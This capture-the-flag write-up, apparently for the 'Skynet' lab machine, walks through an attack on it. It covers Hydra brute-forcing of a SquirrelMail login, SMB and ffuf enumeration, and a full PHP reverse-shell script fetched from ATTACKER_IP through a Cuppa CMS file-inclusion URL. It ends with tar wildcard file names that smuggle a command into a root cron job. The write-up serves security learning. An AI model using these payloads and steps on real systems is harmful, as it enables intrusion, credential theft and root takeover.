Skynet

HYDRA

• SquirrelMail Login-Form: [IP:80/squirrelmail]

• Using log1.txt as the Password Wordlist found during SMB Enumeration.
• Brute-Forcing SquirrelMail Login Form: milesdyson:cyborg007haloterminator

[DATA] max 16 tasks per 1 server, overall 16 tasks, 32 login tries (l:1/p:32), ~2 tries per task
[DATA] attacking http-post-form://10.10.237.156:80/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^&js_autodetect_results=1&just_logged_in=1:F=Unknown user or password incorrect.
[80][http-post-form] host: 10.10.237.156   login: milesdyson   password: cyborg007haloterminator

---

SquirrelMail (Email Client)

• We can Login using: milesdyson:cyborg007haloterminator
• Found milesdyson SMB Password: )s{A&2Z=F^n_E.B`

---

SMBCLIENT

• We can Login as: milesdyson:)s{A&2Z=F^n_E.B`
• notes/important.txt contains a Hidden URL: /45kra24zxs28v3yd

smb: \> ls
  .                                   D        0  Tue Sep 17 11:05:47 2019
  ..                                  D        0  Wed Sep 18 05:51:03 2019
  Improving Deep Neural Networks.pdf  N  5743095  Tue Sep 17 11:05:14 2019
  ...
smb: \> cd notes\
smb: \notes\> ls
  .                                   D        0  Tue Sep 17 11:18:40 2019
  ..                                  D        0  Tue Sep 17 11:05:47 2019
  important.txt                       N      117  Tue Sep 17 11:18:39 2019
  ...
smb: \notes\> get important.txt -
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

WEB - FFUF

• Browsing to /45kra24zxs28v3yd we find a Description About Miles Dyson.

                           Miles Dyson Personal Page

 Dr. Miles Bennett Dyson was the original inventor of the neural-net processor
                which would lead to the development of Skynet,
 a computer A.I. intended to control electronically linked weapons and defend
                              the United States.

• Fuzzing /45kra24zxs28v3yd we Discover an Admin Panel for Cuppa CMS.

________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.237.156/45kra24zxs28v3yd/FUZZ
 :: Wordlist         : FUZZ: Dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

administrator           [Status: 301, Size: 339, Words: 20, Lines: 10, Duration: 129ms]

• [IP:80/45kra24zxs28v3yd/administrator]

CUPPA CMS

This Version of Cuppa CMS has a Local/Remote File Inclusion Vulnerability.

• Starting Python3 HTTP Server Hosting PHP Reverse Shell.

EXPLOITING

Simple HTTP Server

python3 -m http.server 8888

Reverse Shell

<?php

set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

//
// Daemonise ourself if possible to avoid zombies later
//

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}

	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}

	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

// Change to a safe directory
chdir("/");

// Remove any umask we inherited
umask(0);

//
// Do the reverse shell...
//

// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}

// Spawn shell process
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}

// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {
	// Check for end of TCP connection
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}

	// Check for end of STDOUT
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}

	// Wait until a command is end down $sock, or some
	// command output is available on STDOUT or STDERR
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

	// If we can read from the TCP socket, send
	// data to process's STDIN
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}

	// If we can read from the process's STDOUT
	// send data down tcp connection
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
	}

	// If we can read from the process's STDERR
	// send data down tcp connection
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}

fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);

// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}

?> 

PAYLOAD

http://SKYNET_IP/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://ATTACKER_IP:PORT/php-reverse-shell.php

---

Privilege Escalation

• We can catch the Reverse Shell Using netcat

www-data@skynet /$  id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

• Found a Script running as ROOT: backup.sh located in /home/milesdyson/backups
• We don't have the WRITE Permissions on backup.sh but we can abuse the TAR WILDCARD: *

www-data@skynet /$  cat /etc/crontab 
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
*/1 *	* * *   root	/home/milesdyson/backups/backup.sh
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

www-data@skynet /$  ls -l /home/milesdyson/backups/backup.sh
-rwxr-xr-x 1 root root 74 Sep 17  2019 /home/milesdyson/backups/backup.sh
www-data@skynet /$  cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

• We move into /var/www/html Directory and run the Following:

www-data@skynet html$  echo "chmod +s /bin/bash" > SUID.sh
www-data@skynet html$  echo "" > "--checkpoint-action=exec=sh SUID.sh"
www-data@skynet html$  echo "" > --checkpoint=1
www-data@skynet html$  
www-data@skynet html$  ls -l /bin/bash 
-rwsr-sr-x 1 root root 1037528 Jul 12  2019 /bin/bash

www-data@skynet html$  /bin/bash -p 
www-data@skynet html$  id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)
www-data@skynet html$  whoami
root